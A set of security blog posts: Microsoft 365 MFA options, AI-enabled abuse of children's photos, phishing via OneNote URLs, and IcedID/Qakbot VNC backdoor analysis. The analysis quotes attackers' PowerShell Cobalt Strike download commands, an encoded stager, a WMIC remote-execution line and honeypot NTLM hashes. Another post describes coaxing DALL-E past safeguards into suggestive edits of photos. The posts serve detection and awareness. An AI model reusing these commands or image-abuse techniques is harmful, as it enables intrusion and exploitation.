Going this way, we need to consider that exclusions are not possible. Therefore, emergency accounts or user accounts used as service accounts (which are not recommended, as they are inherently less secure than managed identities or service principals) might be blocked. Nevertheless, as we are just evaluating the Microsoft 365 products, we can accept that the environment and cloud applications may be unavailable for a few hours without any major impact on business processes. However, this might become a crucial point in the future.

Finally, it is important to note that these two features do not allow configuring more granular controls, as we will see later in this series.


In this first blog post, we have seen different possibilities to enforce access restrictions that can be implemented when an organization just starts its journey in Microsoft 365:

  • Per-user MFA settings: Allow enforcing MFA for specific users, but can quickly become unmanageable and do not provide granular controls;
  • Security Defaults: Allow enforcing a strong authentication mechanism and blocking legacy authentication protocols that may otherwise let users bypass MFA. This solution is recommended over the per-user MFA settings. However, note that regular users are only prompted for MFA when Azure AD deems it necessary, which is not ideal.

In brief, we can see that both solutions have limitations and will not be suitable for most organizations. Indeed, there are still many aspects, such as restricting access based on specific conditions, that are not covered by these capabilities. We will go over additional key features as well as our recommendations for the implementation of a Zero Trust approach in Microsoft 365 in future blog posts.

In the next blog post, we will see how we can protect our environment against external users and applications.

About the author

Guillaume Bossiroy

Guillaume is a Senior Security Consultant in the Cloud Security Team. His main focus is on Microsoft Azure and Microsoft 365 security where he has gained extensive knowledge during many engagements, from designing and implementing Azure AD Conditional Access policies to deploying Microsoft 365 Defender security products.

Additionally, Guillaume is also interested into DevSecOps and has obtained the GIAC Cloud Security Automation (GCSA) certification.

An Innocent Picture? How the rise of AI makes it easier to abuse photos online.


The topic of this blog post is not directly related to red teaming (which is my usual go-to), but something I find important personally. Last month, I gave an info session at a local elementary school to highlight the risks of public sharing of children’s pictures at school. They decided that instead of their photos being publicly accessible, changes would be implemented to restrict access to a subset of people. However, there are many more instances of excessive sharing of information online; photographers’ portfolios, youth/sports clubs, sharenting on social media, etc.

There are many risks stemming from this type of information being openly available, and the potential risks have only increased with the rise of artificial intelligence. Since you are reading this post on the NVISO blog, I’m assuming you are more cyber-aware than the average person out there and therefore perfectly positioned to use the takeaways from this post and spread the word to others. Obligatory Simpsons reference:

Since the children themselves may not have a say in the matter yet and the people who do may not be aware of the possible dangers, it’s up to us to think of the children!

Traditional Risks

When thinking of the risks linked to the presence of children’s pictures online, an obvious threat is the type of person that might drive a van like this:

There are three traditional risks we will be discussing here:

  • Kidnapping
  • Digital Kidnapping
  • Pornographic Collections


Kidnapping

How does a picture of a child pose a risk of physical kidnapping? First of all, a picture could give away a physical location, for example due to the presence of street signs or names, or recognizable elements such as shops, bars, monuments, schools, etc. If this is a location frequented by the child, a child predator could identify an opportunity for kidnapping there.

In case no identifiable elements are present, certain people might still give away the location through oversharing. Imagine a picture on a publicly accessible Facebook profile with comments such as “birthday party at …”, “visiting grandma & grandpa in …”, or “always a fun day when we go to …”. Often-visited locations can be deduced from comments like these.

Finally, a more technical approach is looking at the picture’s metadata, which often reveals information about the camera that was used, shutter time, lens, and so on, but can also contain the exact location where the picture was taken. In that case, no additional research is required to figure out where the child has been.
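As a defensive aside: in a JPEG file, EXIF metadata (including GPS coordinates) lives in the APP1 segment, so it can be stripped before a picture is shared. The sketch below handles only baseline JPEGs and is an illustration, not a replacement for dedicated metadata-removal tools.

```python
def strip_exif(jpeg: bytes) -> bytes:
    """Remove APP1 (EXIF/XMP, incl. GPS) segments from a baseline JPEG."""
    assert jpeg[:2] == b"\xff\xd8", "not a JPEG (missing SOI marker)"
    out = bytearray(jpeg[:2])
    i = 2
    while i + 4 <= len(jpeg) and jpeg[i] == 0xFF:
        marker = jpeg[i + 1]
        if marker == 0xDA:   # SOS: entropy-coded image data follows
            out += jpeg[i:]
            return bytes(out)
        # Segment length field covers itself (2 bytes) plus the payload.
        length = int.from_bytes(jpeg[i + 2:i + 4], "big")
        if marker != 0xE1:   # keep every segment except APP1
            out += jpeg[i:i + 2 + length]
        i += 2 + length
    out += jpeg[i:]
    return bytes(out)

# Synthetic JPEG: SOI + APP1 carrying fake "GPS!" data + start-of-scan
sample = b"\xff\xd8" + b"\xff\xe1\x00\x06GPS!" + b"\xff\xda" + b"pixels"
print(b"\xff\xe1" in strip_exif(sample))  # False
```

The image data itself is copied through untouched; only the metadata segment disappears.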

Digital Kidnapping

With digital kidnapping, the victim is affected by some type of identity fraud. Pictures of the child are stolen and reused by people online on their own social media, often pretending to be related to the children. An example could be an adoption fantasy, reposting pictures of the child for likes and comments without the child or its parents knowing about this.

Another, more dangerous form of digital kidnapping consists of a sexual predator reusing the victim’s pictures to target other possible victims. Someone could pretend to be a young child themselves to lure other children into meeting with them online or sharing potentially explicit pictures.

Pornographic Collections

Continuing on the topic of potentially explicit pictures, it is not a secret that the Dark Web is full of pornographic pictures of children. However, pictures that you or I would not consider to be risky or explicit could end up in such collections as well. Holiday pictures of children in swimsuits are happily shared by child predators in an attempt to fulfill their fantasies. They search through social media to identify such pictures, sharing them among each other along with sexual fantasies. With pictures of a certain child, they might search for pictures of lookalike children to add to their fantasy. With only a textual story, they might search for pictures of children that match the story.

However, these risks have existed for a number of years already. What is more dangerous is that the life of a child predator looking for pictures has been made much easier by the rise of artificial intelligence.

Next-gen Risks

So what is the problem with public pictures? Not only can they be retrieved by anyone browsing the web, but they can and will also be gathered by automated systems through techniques called spidering and scraping. These activities are not particularly nefarious in themselves and are actually part of the regular functioning of the web, used by search engines for example. However, other applications can make use of these same techniques and have already done so to create massive collections of pictures, even those you would not expect to be public, such as medical records.
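To illustrate how little effort scraping takes, the sketch below collects every image reference from a page using only the Python standard library. This is a deliberately minimal example; a real crawler would add link following, rate limiting, and robots.txt handling.

```python
from html.parser import HTMLParser

class ImageCollector(HTMLParser):
    """Collects the src attribute of every <img> tag in an HTML page."""
    def __init__(self):
        super().__init__()
        self.images = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            src = dict(attrs).get("src")
            if src:
                self.images.append(src)

# A stand-in for a fetched page (e.g. a school's public photo gallery)
page = ('<html><body><img src="/photos/class2023.jpg"><p>news</p>'
        '<img src="/photos/trip.png"></body></html>')
collector = ImageCollector()
collector.feed(page)
print(collector.images)  # ['/photos/class2023.jpg', '/photos/trip.png']
```

Point this loop at a list of URLs and a complete picture archive of a website is built in seconds, which is exactly what large-scale collectors do.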

Facial Recognition

One such example is Clearview AI, which is aimed at law enforcement, applying its facial recognition algorithm to a huge collection of facial images to help generate investigative leads. For the broader public, a similar application has become available, allowing anyone to upload a picture and receive an overview of other pictures with matching faces. While it probably has legitimate use cases, PimEyes provides people with less honorable intentions an easy way to add a high-tech touch to the traditional risks mentioned above. If you haven’t heard about PimEyes yet: it allows you to upload a picture of someone’s face, after which the application provides you with a collection of matching pictures. The tool is already quite controversial, as evidenced by the articles below:

As an example, we provided PimEyes with the face of the middle child selected from the stock photo on the left below, which resulted in a set of pictures containing the same child:

Of course, the algorithm identifies the pictures that are part of the same set of stock photos. When trying this out with a private picture of someone, the set of results contained distinct public pictures of the same person. The algorithm was able to identify them in pictures of low quality, or with the person wearing a hat or a mouth mask covering a large part of the face. Scary stuff, especially considering what someone could do with this output:

  • Imagine a picture of a child without any hints towards the location (e.g. stolen from Facebook or other social media). Upload it to PimEyes and you might be able to link the child’s face to other public pictures where a location can easily be deduced (such as a school website, for example). You now know locations where the child may frequently be present.
  • Remember in one of the previous paragraphs where we said “With pictures of a certain child, they might search for pictures of lookalike children to add to their fantasy.” Well, this type of technology automates the task.
  • Resources above mention a woman having found sexually explicit content through facial recognition. Imagine your child falling victim to revenge porn in the future and having those pictures exposed. Through PimEyes it may even be possible that such pictures are shown in the results together with pictures of when the victim was still a child.

Of course, in addition to these “extreme cases”, in the future it may very well be that possible employers don’t just google your name, but also search your face before an interview. The results may consist of shameful pictures you would rather not have an employer see. There could be a psychological effect as well; maybe in the past you were struggling with certain physical conditions (e.g. being overweight) or affected by other conditions which are no longer relevant at the time when someone tries to find your older pictures. Being confronted with that type of past content may be a painful experience.

Generation of previously non-existent content

We’ve all been playing around and having a lot of fun with ChatGPT, DALL-E, and other AI models. While it is possible to generate a picture from a textual prompt, it is also possible to take an existing image and swap out parts of it based on a textual prompt. What could possibly go wrong? OpenAI does mention the following protections having been put in place: “… we filtered out violent and sexual images from DALL·E 2’s training dataset. Without this mitigation, the model would learn to produce graphic or explicit images when prompted for them, and might even return such images unintentionally in response to seemingly innocuous prompts … “ Let’s see what we are able to do with some stock photos.

Starting off from the same stock photo, I erased the bottom part – very amateurishly, I admit – so that it can be completed again by DALL-E:

Using a fairly innocent prompt (“modify the image to portray the children at the beach in swimming gear”), which could however be the type of picture child predators are after, we get the following possible images (note that we have blurred the resulting images):

Alright, these first two images do indeed look like a fun day at the beach, with an inflatable tire, bucket, and what looks like sand. The third image on the other hand, did surprise me a bit. This time, the girls have received shorts and the middle child even has some cleavage generated (adding to our decision of blurring the image). Do note that this is the result with an innocent prompt, specifically mentioning it is about children, and with mitigations against the generation of explicit content built-in by removing sexual images from the training set. Let’s leave it at this for this photo and try to generate something a bit more suggestive starting from this stock picture resulting from “business woman” as a search term. When asking to “turn this into a pin-up model”, starting from just the neck and head, we are able to receive some spicier results:

So this is what we can create from a completely random picture on the internet without having any photo editing skills. Now imagine this result applied to pictures of children and the risks are obvious.

Taking things a step further, other applications may not have the same limitations applied to their training data and are, as a result, clearly biased towards female nudity. The popular avatar app “Lensa” is known to return nude or semi-nude variations of photos for female users, even when uploading childhood pictures, as evidenced in the following articles:

Taking things another step further, certain apps or services are specifically aimed at the creation of sexually explicit content in the form of deepfakes. Deepfakes are computer-generated images or videos that make use of machine learning to replace the face or voice of someone with that of someone else. Usually this consists of fake pornographic material targeting celebrities. However, deepfake content of adult women personally known to the people wanting to create deepfakes is on the rise, in part due to the ease with which you can create such content or request to have this content created.

However, applying deepfake technology to photo or video content of children is unlikely to remain off-limits for some people, and the report above states that some of the victims of the DeepNude Telegram bot already appear to be under 18.

There is no doubt that artificial intelligence and machine learning are here to stay. With all of their legitimate and highly useful applications, there is inevitably the potential for abuse as well. The only thing we can do as cybersecurity professionals, parents, friends, … is limiting the attack surface as much as possible and trying to make those close to us aware of the dangers.

Tips on reducing the risks

Some general tips we can take into account to protect ourselves and our children include:

  • Determine for yourself and your children what kind of information you are willing to share online and make this desire clear to others. Respect other people’s wishes in this regard. Some people may not like it when you post a picture of them or their children on your social media, even if it is a group picture.
  • Share pictures privately instead of via social media, e.g. mail pictures of the birthday party to a selection of recipients instead of posting online.
  • If you do want to post pictures on your social media, limit the target audience to friends or people you know. As an extension, make sure you only accept connections of people you know.
  • Avoid metadata and limit details regarding location and other information that could give away a location. Some additional guidance on removing metadata is provided by Microsoft here.


Public pictures can easily be scraped into huge collections that are used for different purposes. While traditional risks (such as sharing on the Dark Web) linked to pictures of children are well-known, emerging technologies such as artificial intelligence and machine learning have opened Pandora’s Box for potential abuse. These collections of gathered pictures can be used for facial recognition or generation of new, possibly explicit content. The resulting dangers may not only manifest now, but perhaps years in the future. As such, it is not only about protecting the child they are today, but also the adult they will become.

About the author

You can find Jonas on LinkedIn

Jonas Bauters

Jonas Bauters is a manager within NVISO, mainly providing cyber resiliency services with a focus on target-driven testing.
As the Belgian ARES (Adversarial Risk Emulation & Simulation) solution lead, his responsibilities include both technical and non-technical tasks. While occasionally still performing pass the hash (T1550.002) and pass the ticket (T1550.003), he also greatly enjoys passing the knowledge.

OneNote Embedded URL Abuse

OneNote Embedded URL Abuse

In my previous blogpost I described how OneNote is being abused in order to deliver a malicious URL. In response to this attack, helpnetsecurity recently reported that Microsoft is planning to release a fix for the issue in April this year. Currently, it’s still unknown what this fix will look like, but from helpnetsecurity’s post, it seems like Microsoft’s fix will focus on the OneNote embedded file feature.
During my testing, I discovered that there is another way to abuse OneNote to deliver malware: using URLs. The idea is similar to how Threat Actors already abuse URLs in HTML pages or PDFs, where the user is presented with a fake warning or image to click on, which opens the URL in their browser and loads a phishing page.

The focus of this blogpost will be on URLs within a OneNote file that is delivered as an attachment, not a URL that leads to OneNote online.

There are 3 ways to deliver URLs via a OneNote file.

  1. Just plainly paste your URL in the OneNote file (Clickable URL)
  2. Make some text (like “Open”) clickable with a malicious URL (Clickable text)
  3. Embed URLs in pictures (Clickable picture)

Now it is important to note that these 3 ways rely on social engineering and tricking the user into clicking your URL or picture, either via instructions or by deceiving the user. We have seen this technique being used through OneDrive and SharePoint online already.

So, let’s create some examples and see what this attack could look like.

URLs in OneNote

Clickable URLs

The most straightforward way is to just put a URL in a OneNote file. In an actual phishing email, the OneNote file will probably not just contain the URL alone. To make things more believable, Threat Actors could potentially write a small story or an “encrypted” message in the OneNote file (an example of this can be observed below). The idea would then be to convince the user into clicking the URL in order to “decrypt” the message. Once the URL is clicked, the user would either have to download something or provide credentials to “log in”.

If you would like to read the message in the OneNote file, you have to click the URL, which could then lead to the download of a malicious file or a credential harvesting page.
An example of such an “encrypted” message could be:

An example of a fake encrypted message where a user has to click a URL to decrypt it

Clickable text

Similar to clickable URLs, you can hide a URL behind normal text. Once you hover over the text, you will see where it points. If the address points towards a malicious domain that uses typosquatting (e.g. g00gle[.]com instead of google[.]com), Threat Actors could fool the human eye.

The text “open” hiding a malicious URL

The issue here lies in the fact that once you click the “open” text, you are immediately redirected to the website; there is no pop-up asking whether you really want to visit it.
Taking this technique into account, it is also possible to use our “encrypted message” example from before and make the user think they will visit a legitimate page while embedding a different URL:

The visible URL is hiding a different, malicious URL
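The digit-for-letter substitution mentioned above (g00gle[.]com versus google[.]com) can be demonstrated with a toy normalizer; the mapping table here is a hypothetical, incomplete subset chosen purely for illustration:

```python
# Common digit look-alikes abused in typosquatted domains (illustrative subset).
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s"})

def looks_like(candidate: str, legitimate: str) -> bool:
    """Return True when a candidate domain collapses onto a legitimate one
    after mapping digit look-alikes back to letters."""
    return candidate.lower().translate(HOMOGLYPHS) == legitimate.lower()
```

With this, looks_like("g00gle.com", "google.com") is flagged. Real detection relies on far richer confusable tables (e.g. Unicode confusables); this only shows the principle.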

Clickable Pictures

To create an embedded URL in a picture, right-click the picture and click “Link…”.

Here you can put a URL to your malicious file or phishing page. A Threat Actor could, for example, spin the story so that the victim has to “authenticate” on a fake login website.
Do note that to open a URL that is embedded within a picture, you will need to hold the CTRL key and click the image. The phishing document will have to instruct the user to hold CTRL and click the picture; however, I do not see this as an obstacle for threat actors.

A picture with the button “open” that has an embedded malicious URL

Detection Capabilities

On OneNote Interaction

Opening the URL will launch the default browser. This translates to OneNote spawning a child process, the browser. A full process flow could look something like this:

Process execution of explorer.exe > Outlook.exe > OneNote.exe > firefox.exe

Do note that, as Outlook typically does, once you click the file it saves a copy in a temporary cache folder (depending on your version of Outlook this can be a slightly different place than shown here, but generally the folder path will contain INetCache and Content.Outlook).

A quick hunting rule for this behaviour is to look for the process tree observed above. This process tree can be adjusted to the needs of your environment, depending on which browser is being used (e.g. if you are running brave.exe, you should include it in the “FileName” section of the query). The query below assumes Microsoft Defender’s DeviceProcessEvents table:

DeviceProcessEvents
| where InitiatingProcessFileName contains "onenote.exe"
| where FileName has_any ("firefox.exe","msedge.exe","chrome.exe")

Now, if you would like a more “catch all” approach, the last line can be replaced with a filter on the command line that looks for http or other protocols such as ftp, as both Chromium- and Firefox-based browsers accept URLs as a command-line argument to open a specific website.

| where ProcessCommandLine has_any ("http","ftp")
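Outside of a KQL engine, the same two heuristics can be sketched in plain Python over hypothetical process-event records. The field names mirror Defender’s columns, but the schema and function are assumptions made purely for illustration:

```python
BROWSERS = {"firefox.exe", "msedge.exe", "chrome.exe", "brave.exe"}

def flag_onenote_child(event: dict, catch_all: bool = False) -> bool:
    """Flag browser (or URL-bearing) child processes of OneNote.

    `event` mimics a few DeviceProcessEvents columns; this is a
    simplification, not a drop-in detection rule.
    """
    if event.get("InitiatingProcessFileName", "").lower() != "onenote.exe":
        return False
    if catch_all:
        # Broader match: any child whose command line carries a URL scheme.
        cmd = event.get("ProcessCommandLine", "").lower()
        return "http" in cmd or "ftp" in cmd
    return event.get("FileName", "").lower() in BROWSERS
```

The `catch_all` flag corresponds to swapping the browser-name filter for the command-line filter shown above.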

On Email Delivery

During our tests, Microsoft Defender was unable to detect or extract the URLs embedded in the OneNote file, as can be observed in the screenshot below; it neither extracted the URLs nor showed that a URL was embedded in the file.

No URLs extracted from the OneNote Attachment

This also means that Microsoft does not create a safe link for the URL, allowing a threat actor to bypass the “potential malicious URL clicked” alert that helps defend against phishing pages: the alert relies on URL clicks, which cannot be registered if no URLs are detected.


Whilst embedded files within OneNote currently remain a big threat, you should not forget that other OneNote features can be abused for malicious intent as well. As we observed, Microsoft does not extract URLs from a OneNote file, and there are multiple ways of avoiding detection and tricking the user into clicking a URL. From there, the same tactics are used to deliver second-stage malware, be it via an ISO file or a ZIP file containing malicious scripts.

Nicholas Dhaeyer

Nicholas Dhaeyer is a Threat Hunter for NVISO. Nicholas specializes in Threat Hunting, Malware analysis & Industrial Control System (ICS) / Operational Technology (OT) Security. Nicholas has worked in the NVISO SOC solving security incidents for our MDR clients. You can reach out to Nicholas via Twitter or LinkedIn

IcedID & Qakbot’s VNC Backdoors: Dark Cat, Anubis & Keyhole


IcedID (a.k.a. BokBot) is a popular Trojan which first emerged in 2017 as an Emotet delivery. Originally described as a banking Trojan, IcedID shifted its focus to embrace the extortion/ransom trend and nowadays acts as an initial access broker, mostly delivered through malspam campaigns. Over the last few years, IcedID has commonly been seen delivering Cobalt Strike prior to a multitude of ransomware strains such as Conti or REvil.

IcedID itself is composed of multiple modules, one of which is a poorly documented VNC backdoor (Virtual Network Computing) acting as a cross-platform remote desktop solution. The existence of this module (branded “HDESK” or “HDESK bot”) is only partially mentioned by Malwarebytes (2017) and Kaspersky (2021), while its usage has been widely observed and occasionally vulgarized as “Dark VNC”.

As part of our research efforts, NVISO has been analyzing IcedID and Qakbot’s command & control communications. In this blog-post we will share insights into IcedID and Qakbot’s VNC backdoor(s) as seen from an attacker’s perspective, insights we obtained by extracting and reassembling VNC (RFC6143) traffic embedded within private and public captures published by Brad Duncan.
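For readers wanting to reproduce this kind of carving, the first step is recognizing a VNC session at all: RFC 6143 mandates that the server opens with a 12-byte ProtocolVersion banner such as "RFB 003.008\n". A minimal parser for that banner might look like this (a sketch, not the tooling we used):

```python
def parse_rfb_version(stream: bytes):
    """Parse the 12-byte RFB ProtocolVersion handshake (RFC 6143, section 7.1.1).

    Returns (major, minor) or None if the stream does not start with a
    valid RFB banner -- useful when carving VNC sessions out of pcaps.
    """
    banner = stream[:12]
    if len(banner) != 12 or not banner.startswith(b"RFB ") or banner[-1:] != b"\n":
        return None
    try:
        major, minor = banner[4:11].split(b".")
        return int(major), int(minor)
    except ValueError:
        return None
```

Matching this banner on reassembled TCP streams is enough to pick VNC sessions out of a capture, regardless of the port the backdoor uses.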

In this post we introduce the three variants we observed as well as their capabilities: Dark Cat, Anubis and Keyhole. We’ll follow by exposing common techniques employed by the operators before revealing information they leaked through their clipboard data.

Bokbot or Qakbot?

This research was originally titled “IcedID’s VNC Backdoors: Dark Cat, Anubis & Keyhole” and focused solely on IcedID (Bokbot). Brad however correctly pointed out that Dark Cat is only leveraged by Qakbot, samples of which were mistakenly included in this research after being confused with Bokbot (IcedID).

IcedID and Qakbot VNC traffic remains extremely similar as can be observed in the following three VNC backdoors.

HDESK Variants

During our analysis of both public and private IcedID and Qakbot network captures, we identified 3 VNC backdoor variants, all part of the HDESK strain. These backdoors are typically activated during the final initial-access stages to initiate hands-on-keyboard activity. Supposedly short for “Hidden Desktop”, HDESK leverages Windows features allowing the backdoor to create a hidden desktop environment not visible to the compromised user. Within this hidden environment, the threat actors can start leveraging the user interface to perform regular tasks such as web browsing, reading mails in Outlook or executing commands through the Command Prompt and PowerShell.

We believe with medium confidence that these backdoors share origins, as the Dark Cat interface (used by Qakbot) has traits that can later be found within the Anubis and Keyhole interfaces (used by IcedID).

Dark Cat VNC

The “Dark Cat VNC” variant was first observed in November 2021 and is believed to be the named releases v1.1.2 and v1.1.3 used by Qakbot. Its usage was still extensively observed by the end of 2022. Upon initial access, the home screen presents the operator with multiple options to create new sessions alongside backdoor metrics such as idle time or lock state.

Figure 1: The Dark Cat VNC interface.
Figure 1: The Dark Cat VNC interface.

User Session

Figure 2: A Dark Cat USER session.

The USER session exists in three variations (read, standard and black) which allows the operator to switch the VNC view to the user’s visible desktop.

HDESK Session

The HDESK session exists in three variations as well: standard, Tmp and NM (also called bot). This session type causes the backdoor to create a new hidden desktop not visible to the compromised user.

Based on the activity we observed, the HDESK sessions are (understandably) preferred by the operators.

Figure 3: A Dark Cat HDESK session.

As HDESK sessions by default do not benefit from Windows’s built-in UI, operators are presented with an alternative start-menu to launch common programs. In Dark Cat these are Chrome, Firefox, Internet Explorer, Outlook, Command Prompt, Run and the Task Manager. A Windows Shell button is also present, which we believe, if used, will spawn the regular Windows UI most users are accustomed to. Starting with Dark Cat v1.1.3, Edge Chromium furthermore joins the list of available software.

Figure 4: The Dark Cat HDESK session interface.
Figure 4: The Dark Cat HDESK session interface.

Besides the alternate start-menu, operators can access some settings using the top-left orange icon which includes:

  • Defining the hidden windows’ sizes.
  • Defining the Chrome profile to use (lite or not).
  • Deleting the browser’s profile(s).
  • Killing the child process(es).
Figure 5: The Dark Cat HDESK settings interface.

WebCam Session

The WebCam sessions exist in three variations. While we were unable to capture its usage (honeypots lack webcams and operators do not attempt to use this session kind), its presence suggests IcedID’s VNC backdoors are capable of capturing compromised devices’ webcam feeds.

Anubis VNC

The “Anubis VNC” variant was first observed in January 2022 and is believed to be the named release v1.2.0 used by IcedID. Its usage was last observed in Q3 2022. No capability differences were observed between Anubis and Dark Cat v1.1.3.

Figure 6: The Anubis VNC interface.
Figure 6: The Anubis VNC interface.


Keyhole VNC

The “Keyhole VNC” variant was first observed in October 2022 and is believed to be the named releases v1.3 as well as v2.1. Its usage was observed as recently as Q1 2023.


The first major change observed within Keyhole is its new color palette capability, where operators can pick regular RGB (a.k.a. colored) or grayscale (a.k.a. black & white) feeds. The actual intent of this feature is unclear as, at least from a network perspective, both RGB and grayscale consume the same number of bytes per pixel, resulting in equal performance.

Figure 7: The Keyhole color palette selector.
Figure 7: The Keyhole color palette selector.

HDESK Sessions

Keyhole v1.3 provides a refreshed start-menu where icons have been updated and options renamed; the once cryptic Win Shell option has been rebranded to the My Computer option.

Figure 8: The Keyhole (v1.3) HDESK session interface in gray-scaled color palette.
Figure 8: The Keyhole (v1.3) HDESK session interface in gray-scaled color palette.

Later on, with v2.1, Keyhole renamed additional options and introduced the PowerShell and Desktop options. We assess with low confidence that the Desktop option differs from the My Computer option only by also rendering the desktop background, whereas the latter was only seen generating desktop views without a background image.

Figure 9: The Keyhole (v2.1) HDESK session interface.
Figure 9: The Keyhole (v2.1) HDESK session interface.

Modus Operandi

Obtaining recordings of threat actors at work is useful for understanding which technical capabilities they possess, and also allows the identification of the TTPs (Tactics, Techniques & Procedures) they employ. In the following section we review some of the most recurring actions we observed IcedID and Qakbot operators perform through the backdoors described above.

🍯 Nothing confidential here…
All media published within this section were reconstructed from publicly published artifacts. As all information is public, we have refrained from redacting otherwise sensitive details such as company names and accounts.

Task Manager

To no surprise, usage of the Task Manager to identify running software was extremely common. While hard to detect, as operators did not attempt to interfere with security software, the usage of this graphical utility outlined one interesting drawback: on multiple (non-published) occasions we observed actors identifying known security tooling based on its process icon, whereas icon-less tooling blended in with many of Windows’ icon-less applications.

Figure 10: An Anubis operator performing interactive reconnaissance through the Task Manager.


Outlook

Another quite common technique was the inspection of Outlook, most likely to identify poorly populated honeypot networks. As was the case for the Task Manager, the graphical usage of Outlook by an operator is indistinguishable from regular user activity. From the available recordings, no attempts were made to use Outlook for further phishing/spam.

Figure 11: A Dark Cat operator performing interactive reconnaissance through Outlook.
Figure 12: A Dark Cat operator inspecting Outlook's "Rules and Alerts" settings.
Figure 12: A Dark Cat operator inspecting Outlook’s “Rules and Alerts” settings.

On one singular occasion, we observed the actor expressing interest in Outlook’s rules. The backdoor session was however terminated before they undertook any action, making it unclear whether this was part of the reconnaissance activities or whether they were planning to set up malicious email redirection rules.

Web Browsers

From the available browsers, Edge and Chrome were the favorites. Using these, operators commonly validated the browser’s connectivity by accessing Amazon.

During one intrusion, the operator went as far as attempting to access the compromised user’s Amazon payment information. This attempt is a good reminder that beyond a user’s corporate identity, personal accounts are definitely at risk as well.

Figure 13: A Dark Cat operator accessing Amazon's "Your Payments" account page.
Figure 13: A Dark Cat operator accessing Amazon’s “Your Payments” account page.
Figure 14: A Keyhole operator inspecting Edge's version details.
Figure 14: A Keyhole operator inspecting Edge’s version details.

On some occasions operators accessed the edge://version URL. While this page exposes mostly useless information to attackers, the capture reveals a sizeable number of uncommon flags usable for threat hunting.

Noteworthy is the Profile path located within the user’s temporary directory and passed using the --user-data-dir= flag, a pattern that from our available telemetry seems quite uncommon for msedge.exe in enterprise environments. The pattern is however occasionally used for applications such as opera_autoupdate.exe and msedgewebview2.exe.

Also worth noting is the usage of edge://settings/passwords to identify additional accounts.

Figure 14: A Keyhole operator interactively inspecting Edge's stored passwords.
Figure 14: A Keyhole operator interactively inspecting Edge’s stored passwords.
Figure 15: Edge displaying a warning banner due to the usage of an unsupported flag during a Dark Cat session.
Figure 15: Edge displaying a warning banner due to the usage of an unsupported flag during a Dark Cat session.

A final commonly observed pattern is the usage of the unsupported --no-sandbox command-line flag in Edge, resulting in a notification banner. From our available telemetry in enterprise environments, the usage of this flag for Edge is uncommon, as opposed to Electron-based applications (including Microsoft Teams and WhatsApp), which use it extensively.
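These two Edge observations (a temp-directory --user-data-dir= profile and the unsupported --no-sandbox flag) translate into a simple hunting heuristic. The sketch below uses illustrative field names rather than any specific EDR schema:

```python
import re

def edge_flags_suspicious(image: str, cmdline: str) -> bool:
    """Hunt heuristic from the observations above: msedge.exe launched with
    a temp-directory profile or the unsupported --no-sandbox flag.
    Field names (image, cmdline) are illustrative."""
    if image.lower() != "msedge.exe":
        return False
    low = cmdline.lower()
    if "--no-sandbox" in low:
        return True
    match = re.search(r'--user-data-dir=([^\s"]+)', low)
    # Flag profiles rooted in a temporary directory (Windows or POSIX style).
    return bool(match and ("\\temp\\" in match.group(1) or "/tmp/" in match.group(1)))
```

In practice you would still baseline this against your own telemetry, since legitimate tooling occasionally launches Edge with unusual flags.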


Windows Explorer

Another commonly observed utility used to inspect the compromised device’s files and folders, including payloads dropped through other channels, is Windows Explorer. As was the case with Outlook, Explorer’s usage is indistinguishable from legitimate use, making it a hard-to-detect technique.

Figure 16: A Keyhole operator interactively using Explorer to inspect folders.

Command Prompt

Last but not least, the command prompt was unsurprisingly used extensively, commonly for reconnaissance activities, including the usage of:

  • whoami /upn for system user discovery (T1033).
  • ipconfig for system network configuration discovery (T1016).
  • arp -a for both remote system discovery (T1018) and device identification based on the MAC address.
  • dir for file and directory discovery (T1083) over SMB (T1021.002).
  • nltest /dclist for the remote discovery of the domain controllers (T1018).
  • ping for network connectivity tests to remote systems (T1018).
  • PowerShell (T1059.001) to deploy Cobalt Strike.

As opposed to the previous, mostly passive TTPs, the active usage of the Command Prompt and PowerShell is often where detection rules stand a fighting chance.

Figure 17: An Anubis operator performing initial reconnaissance using the Command Prompt in an HDESK session.

Clipboard Leaks

As VNC acts as a remote desktop solution, another trove of data was found within the clipboard synchronization feature. By copy/pasting between victim and attacker machines, operators exposed some additional TTPs and information surrounding their operations.

In this section we will expose the most common and interesting data found within their clipboards.

Cobalt Strike

As expected, many variations of Cobalt Strike downloaders were observed. These leveraged both IPs and domain names, as well as standard and non-standard ports such as HTTP on port 443 or HTTPS on port 8080.

IEX ((new-object net.webclient).downloadstring(''))
IEX ((new-object net.webclient).downloadstring('')) 
IEX ((new-object net.webclient).downloadstring(''))
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''))"

In some cases, the operators directly leveraged PowerShell shellcode stagers as shown in the following trimmed command.

powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPA...AGQAKAApADsA

For compromised accounts with sufficient access, WMIC commands were further issued to deploy Cobalt Strike on remote appliances.

C:\Windows\System32\wbem\wmic.exe /node: process call create "cmd.exe /c powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring(''))"""

Finally, although we were unable to identify which tooling would rely on such a format, actors leaked what appears to be a naming convention.



Besides Cobalt Strike, operators exposed a DllRegisterServer command which Unit 42 observed being used with rundll32.exe and attributed to the deployment of a VNC backdoor.

DllRegisterServer --id %id% --group %group% --ip,,,,,,,,,,

NTLM Hashes

Another interesting finding was the presence of NTLM hashes within the clipboard data, exposing the compromise’s scope. In this case, the impacted organization was part of a honeypot environment.

DESKTOP-4GDQQL7\admin 4081e42481a5986e9bfcb7000bbe98f4
TECHHIGHWAY-DC\Administrator 4081e42481a5986e9bfcb7000bbe98f4
TECHHIGHWAY-DC\bennie.mcbride 4081e42481a5986e9bfcb7000bbe98f4
TECHHIGHWAY-DC\brenda.richardson 4081e42481a5986e9bfcb7000bbe98f4
TECHHIGHWAY-DC\daryl.wood 4081e42481a5986e9bfcb7000bbe98f4
TECHHIGHWAY\daryl.wood 4081e42481a5986e9bfcb7000bbe98f4
TECHHIGHWAY-DC\saul.underwood 4081e42481a5986e9bfcb7000bbe98f4
DESKTOP-4GDQQL7\WDAGUtilityAccount 7cd5fddee0cd00dde47014fe7f52faa4
TECHHIGHWAY-DC\krbtgt a7b565c147b69380d0b35f37ce478a1c
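The giveaway in a dump like the one above is hash reuse: multiple accounts sharing one NT hash means one shared password. Grouping accounts by hash makes this jump out, as in this sketch (which assumes the simple DOMAIN\user <hash> line format shown; the function name is ours):

```python
from collections import defaultdict

def group_by_hash(dump: str) -> dict:
    """Group 'DOMAIN\\user <nt_hash>' dump lines by hash; any group with
    more than one account indicates password reuse worth investigating."""
    groups = defaultdict(list)
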